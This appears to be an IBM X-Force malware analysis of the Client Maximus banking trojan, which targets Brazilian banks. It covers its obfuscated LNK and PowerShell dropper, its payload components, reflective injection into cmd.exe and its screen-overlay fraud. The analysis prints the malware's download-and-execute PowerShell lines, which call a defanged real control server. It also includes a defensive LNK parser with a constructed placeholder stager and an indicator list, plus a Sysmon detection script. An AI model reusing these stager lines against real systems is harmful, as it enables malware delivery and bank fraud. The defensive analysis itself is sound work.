In January 2017, IBM X-Force research reported the development of a new remote-access malware code targeting Brazilian banks. The malware, dubbed Client Maximus, was observed in ongoing campaigns and continues to target online banking users in the country. The development of Client Maximus, which is believed to be commercially available in Brazilian fraud and cybercrime communities, continues as new variants of the malware emerge.

IBM X-Force recently analyzed a new and upgraded version of the malware. Client Maximus appears to have been written specifically for attacks against Brazilian banks. Analysis of different components of this code led our researchers to the overall understanding of the growing sophistication of cybercrime tools in Brazil.

Read the white paper: Shifting the balance of power with cognitive fraud prevention

Initial Malware Download

The initial infection routine begins with an obfuscated LNK file that runs CMD.exe /c with PowerShell.exe as its parameter. PowerShell, in turn, receives its own parameter, a Base64-encoded script, which it decodes and executes immediately; that script downloads a further file from the attacker's control server and executes it.

An interesting note about the initial LNK file used by Client Maximus is that the complete Base64-encoded PowerShell command line is not visible in the Windows user interface, even in the file's Properties dialog, whose Target field shows only the first 260 characters of the target and its arguments. The full command line is only recoverable with a dedicated ShellLink (LNK) parser or a hex editor.

Decoding the Base64 yields the following PowerShell. Note the randomized casing of the cmdlet and method names: PowerShell itself is case-insensitive, so the script runs unchanged, but a case-sensitive string match on "DownloadString" or "IEX" misses it:

CleAr-HoST;iEX(NEW-oBjEcT nET.webClIEnT).DoWnLOaDSTRiNg('hxxps://1361227624.rsc.cdn77.org/v2/gl.php?aHR0cHM6Ly8xMzYxMjI3NjI0LnJzYy5jZG43Ny5vcmcvdjJ8MHVvRA%3D%3D%')
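To make the point about the hidden command line concrete, here is an added example (not code from the article or from IBM) of the kind of ShellLink parser a responder uses to recover what the Properties dialog does not show: it walks the MS-SHLLINK layout past the optional IDList and LinkInfo structures to the COMMAND_LINE_ARGUMENTS string, decodes a PowerShell -EncodedCommand argument (Base64 of UTF-16LE), and then looks for download-and-execute indicators case-insensitively, so the randomized casing above does not help the attacker. The use of the -enc switch, the sample shortcut and its script (a stand-in for the one above, pointing at a placeholder host) are all constructed for this example; the article does not show the real shortcut's exact switches.

```python
"""Parse a Windows ShellLink (.lnk) file and recover an encoded PowerShell command.

Added example, not code from the original article or from IBM. The layout follows
MS-SHLLINK; the sample shortcut, its -enc switch and its script are constructed here.
"""
import base64
import re
import struct
import uuid

LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")

# LinkFlags (MS-SHLLINK 2.1.1) that change how the rest of the file is laid out
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData fields appear in this fixed order, each present only if its flag is set
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -en, -enc ...)
ENCODED_CMD_RE = re.compile(r"-e(?:ncodedcommand|nco|nc|n|c)?\b\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a .lnk file as a dict."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a ShellLink: bad HeaderSize")
    if uuid.UUID(bytes_le=data[4:20]) != LNK_CLSID:
        raise ValueError("not a ShellLink: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    off = 0x4C                                   # fixed 76-byte header
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (2 bytes) + IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize counts itself
        off += struct.unpack_from("<I", data, off)[0]
    fields = {}
    for flag, name in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, off)[0]   # CountCharacters, no terminator
        off += 2
        if flags & IS_UNICODE:
            fields[name] = data[off:off + 2 * count].decode("utf-16-le")
            off += 2 * count
        else:
            fields[name] = data[off:off + count].decode("cp1252")
            off += count
    return fields


def decode_encoded_command(arguments: str):
    """Recover the script behind powershell.exe -EncodedCommand (Base64 of UTF-16LE), or None."""
    m = ENCODED_CMD_RE.search(arguments)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def build_sample_lnk(arguments: str, with_idlist: bool = False) -> bytes:
    """Constructed fixture: a minimal Unicode LNK pointing at cmd.exe, as a dropper would write it."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    idlist_blob = b""
    if with_idlist:                              # exercise the IDList skip in the parser
        flags |= HAS_LINK_TARGET_ID_LIST
        idlist = struct.pack("<H", 4) + b"\x1f\x00" + b"\x00\x00"   # one dummy ItemID + TerminalID
        idlist_blob = struct.pack("<H", len(idlist)) + idlist
    header = struct.pack(
        "<I16sIIQQQIIIHHII",
        0x4C, LNK_CLSID.bytes_le, flags,
        0x20,          # FILE_ATTRIBUTE_ARCHIVE
        0, 0, 0,       # creation / access / write times
        0, 0,          # FileSize, IconIndex
        7,             # ShowCommand = SW_SHOWMINNOACTIVE keeps the console window out of sight
        0, 0, 0, 0,    # HotKey, Reserved1..3
    )

    def string_data(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + idlist_blob + string_data(r"..\..\..\Windows\System32\cmd.exe") + string_data(arguments)


# Constructed stand-in for the first stage: same Clear-Host; IEX(...DownloadString()) shape and
# randomized casing, with a placeholder host instead of the real staging server.
SAMPLE_SCRIPT = "CleAr-HoST;iEX(NEW-oBjEcT nET.webClIEnT).DoWnLOaDSTRiNg('https://stage.example.invalid/v2/gl.php')"
SAMPLE_ARGS = "/c powershell.exe -nop -w hidden -enc " + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_LNK = build_sample_lnk(SAMPLE_ARGS, with_idlist=True)

# Compared against the lower-cased script, so mixed-case obfuscation does not evade them
INDICATORS = ("downloadstring", "downloaddata", "iex", "invoke-expression", "reflection.assembly")


def triage_lnk(data: bytes) -> dict:
    """Parse, decode and flag: target, recovered script and which indicators it contains."""
    fields = parse_lnk(data)
    script = decode_encoded_command(fields.get("arguments", ""))
    hits = [i for i in INDICATORS if script and i in script.lower()]
    return {"target": fields.get("relative_path"), "script": script, "indicators": hits}


if __name__ == "__main__":
    print(triage_lnk(SAMPLE_LNK))
```

Run it on a real shortcut with `triage_lnk(open(path, "rb").read())`; a shortcut whose target is cmd.exe or powershell.exe and whose recovered script contains any of the indicators is worth pulling into a sandbox regardless of what the Properties dialog showed.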

The resulting downloaded file is yet another obfuscated PowerShell script that fetches a .NET assembly named "Loader." That element is dynamically loaded as follows:

$bytes = (New-Object Net.WebClient).DownloadData("hxxps://1361227624.rsc.cdn77.org/v2/loader.dll")

[Reflection.Assembly]::Load($bytes)

The next step is the execution of what the malware's developer named a "Go" method on the dynamically loaded assembly (see the code in Figure 1):

[Loader]::Go("hxxps://1361227624.rsc.cdn77.org/v2/","CpWY")

The “Go” method performs the following checks on the environment as a means to evade discovery by unwanted parties and anti-malware tools:

  • Checks whether the machine's IP address falls inside a Brazilian IP range;
  • Scans for the presence of a number of security applications on the endpoint;
  • Generates random names for the files and folders it is about to create; and
  • Downloads the 32-bit or 64-bit payload from the control server to match the Windows architecture of the machine.

After the loader’s run, the original PowerShell script proceeds to create two files:

  1. A VB script (VBS) file that will execute the payload once it is downloaded; and
  2. A LNK file (shortcut) that executes that VB script.

In the last step before the payload arrives, the PowerShell script executes the LNK file, which, in turn, executes the VBS file:

Start-Process $lnkFileName

The Client Maximus Four-Part Payload

The malware's payload itself comprises four randomly named files; the names used in the sections below are those observed on the sample we analyzed. File names vary between variants and machines, as the malware generates the random names before creating the files. Let's have a look at what these components do.

WindowsAnytimeUpgradeResults.exe.config

This file contains only the list of supported .NET runtimes for the executable of the same name. On its own it is of no forensic interest.

WindowsAnytimeUpgradeResults.exe

This file is a known, legitimate .NET WinForms application called PShellExec, which IT administrators use to encrypt and decrypt PowerShell scripts. (Windows Forms is the graphical class library in the Microsoft .NET Framework for writing rich client applications for desktop, laptop and tablet PCs.) In the context of the malware's operation, it is used to decrypt the heavily obfuscated PowerShell script stored as 2620343c, using the Zebra Bank Structure (ZBS) file as its argument.

To make debugging more arduous, the malware's developer made the runtime de-obfuscation of strings, together with some junk code, run across multiple threads.

2620343c.zbs

ZBS files are typically used for data structure input/output. This file is, in reality, .NET-emitted code stored as a compressed byte array and encoded in Base64. The resulting assembly, Scripter.exe, is itself heavily obfuscated; the first executable loads it at runtime with Assembly.Load(byte[]) and calls into it with MethodInfo.Invoke().

The output of WindowsAnytimeUpgradeResults.exe is an obfuscated PowerShell script that loads a dynamic link library (DLL) into another process from memory, doing the work of the Windows loader itself rather than calling it. This technique, reflective PE injection, is implemented in the PowerSploit framework (its Invoke-ReflectivePEInjection function), which also offers various other features, such as logon token exfiltration and persistence techniques.

This final PowerShell code creates a new cmd.exe process and injects the DLL above into that legitimate cmd.exe process, so the payload runs under a trusted process name.
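The chain described above leaves a distinctive trail in endpoint telemetry. As an added example (not code from the article or from IBM), the following Python correlates Sysmon-style events into two findings: the first-stage shortcut (explorer.exe launching cmd.exe whose command line hands PowerShell an encoded script) and the final stage (PowerShell creating a cmd.exe, starting a thread inside it, and that cmd.exe then connecting out). The events are constructed to mirror the stages in the text and use Sysmon's field names; the example assumes the injector uses CreateRemoteThread, which Sysmon records as Event ID 8, and an injector that starts its thread some other way would need a different middle link. The process IDs and destination addresses are made up.

```python
"""Correlate Sysmon-style endpoint events into the Client Maximus execution chain.

Added example, not code from the original article or from IBM. Events are
constructed here; the rules are this example's own and assume CreateRemoteThread
is the injection primitive (Sysmon Event ID 8).
"""
import base64
import re

# Any unambiguous prefix of -EncodedCommand followed by a Base64 blob of plausible length
ENCODED_FLAG_RE = re.compile(
    r"(?:^|\s)-e(?:ncodedcommand|nco|nc|n|c)?\s+[A-Za-z0-9+/=]{20,}", re.IGNORECASE)

POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
EXPLORER = r"C:\Windows\explorer.exe"


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def is_lnk_stager(e: dict) -> bool:
    """EID 1: explorer.exe launched cmd.exe whose command line hands PowerShell an encoded script."""
    return (e["EventID"] == 1
            and image_name(e["Image"]) == "cmd.exe"
            and image_name(e["ParentImage"]) == "explorer.exe"
            and "powershell" in e["CommandLine"].lower()
            and ENCODED_FLAG_RE.search(e["CommandLine"]) is not None)


def is_cmd_child_of_powershell(e: dict) -> bool:
    """EID 1: a cmd.exe created by PowerShell, the injection target of the final stage."""
    return (e["EventID"] == 1 and image_name(e["Image"]) == "cmd.exe"
            and image_name(e["ParentImage"]) == "powershell.exe")


def is_remote_thread_into_cmd(e: dict) -> bool:
    """EID 8 (CreateRemoteThread): PowerShell starting a thread inside cmd.exe."""
    return (e["EventID"] == 8 and image_name(e["SourceImage"]) == "powershell.exe"
            and image_name(e["TargetImage"]) == "cmd.exe")


def is_cmd_network_connect(e: dict) -> bool:
    """EID 3: cmd.exe has no business opening sockets of its own."""
    return e["EventID"] == 3 and image_name(e["Image"]) == "cmd.exe"


def correlate(events: list) -> list:
    """Return (rule, ProcessId) findings; the injection rule needs all three links of the chain."""
    findings = [("lnk_powershell_stager", e["ProcessId"]) for e in events if is_lnk_stager(e)]
    spawned = {e["ProcessId"] for e in events if is_cmd_child_of_powershell(e)}
    injected = {e["TargetProcessId"] for e in events if is_remote_thread_into_cmd(e)}
    connected = {e["ProcessId"] for e in events if is_cmd_network_connect(e)}
    for pid in sorted(spawned & injected & connected):
        findings.append(("reflective_injection_into_cmd", pid))
    return findings


ENC = base64.b64encode("Clear-Host".encode("utf-16-le")).decode("ascii")  # stand-in encoded script

# Constructed events: the infection chain plus benign noise that must not fire
SAMPLE_EVENTS = [
    # stage 1: double-clicked LNK -> cmd.exe /c powershell.exe -enc ...
    {"EventID": 1, "ProcessId": 4100, "Image": CMD, "ParentProcessId": 2088, "ParentImage": EXPLORER,
     "CommandLine": f"cmd.exe /c powershell.exe -nop -w hidden -enc {ENC}"},
    {"EventID": 1, "ProcessId": 4132, "Image": POWERSHELL, "ParentProcessId": 4100, "ParentImage": CMD,
     "CommandLine": f"powershell.exe -nop -w hidden -enc {ENC}"},
    # final stage: PowerShell creates a fresh cmd.exe, injects into it, and the injected process calls out
    {"EventID": 1, "ProcessId": 4188, "Image": CMD, "ParentProcessId": 4132, "ParentImage": POWERSHELL,
     "CommandLine": "cmd.exe"},
    {"EventID": 8, "SourceProcessId": 4132, "SourceImage": POWERSHELL,
     "TargetProcessId": 4188, "TargetImage": CMD},
    {"EventID": 3, "ProcessId": 4188, "Image": CMD, "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    # noise: an interactive cmd.exe that connects out but was never spawned by or injected from PowerShell
    {"EventID": 1, "ProcessId": 5000, "Image": CMD, "ParentProcessId": 2088, "ParentImage": EXPLORER,
     "CommandLine": "cmd.exe"},
    {"EventID": 3, "ProcessId": 5000, "Image": CMD, "DestinationIp": "192.0.2.5", "DestinationPort": 445},
]


if __name__ == "__main__":
    for rule, pid in correlate(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

Requiring all three links (spawn, remote thread, network connection) keeps the injection rule quiet on an ordinary cmd.exe that happens to reach the network, while the stager rule fires on the shortcut alone, which is the earliest point at which the chain can be cut.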

The following diagram gives an overview of the infection routine applied by this new variant of the Client Maximus banking malware:

Logical Attack Flow on the Victim’s Side

Once the endpoint has been successfully infected with the malware, Client Maximus will continually monitor the user’s browsing activity. When the user tries to reach his or her bank’s website — if that bank is on the malware operator’s target list — Client Maximus will go into action.

The malware’s top-level modus operandi is simple, yet effective:

  • Upon detecting a matching bank site/application, it launches full-screen overlay images to block the victim’s access to the banking session he or she initiated in the browser. Those screens also communicate fake messages to the victim, using social engineering to keep them waiting while the fraudster initiates a remote-access session to take control of the endpoint.
  • Client Maximus leverages remote control capabilities to take over the victim’s device, allowing the attacker to attempt a fraudulent transaction from that trusted endpoint. Moreover, for cases where the victim uses an application, rather than a website, for banking activity, the attacker can access that application on the desktop, see virtual keyboard activity and monitor the user’s actions in real time.

Client Maximus' modus operandi is not much different from that of earlier malicious code in the remote overlay family. The scheme is described in further detail in our previous blog about Client Maximus.

Brazilian Malware Escalating in Sophistication

In 2017, IBM X-Force has been seeing an ongoing escalation of malware codes in Brazil. After collaborating with external parties, it appears that there has been a lasting step-up in the sophistication of Brazilian malware.

On top of frequently seeing new Client Maximus variants operated by different actors, and the upgrade the malware has recently undergone, X-Force researchers also found a new code being propagated in Brazil. This code is named Vernon, and IBM X-Force will publish more information about it in the coming week.

Banks wishing to protect their customers from evolving threats and cybercrime modus operandi are invited to learn more about IBM Trusteer advanced fraud protection.

Individuals looking for tips on protecting themselves from remote overlay malware and other banking Trojans are invited to read our tips page for staying safer on PC/mobile devices.

We worked with the following MD5 hashes for this blog:

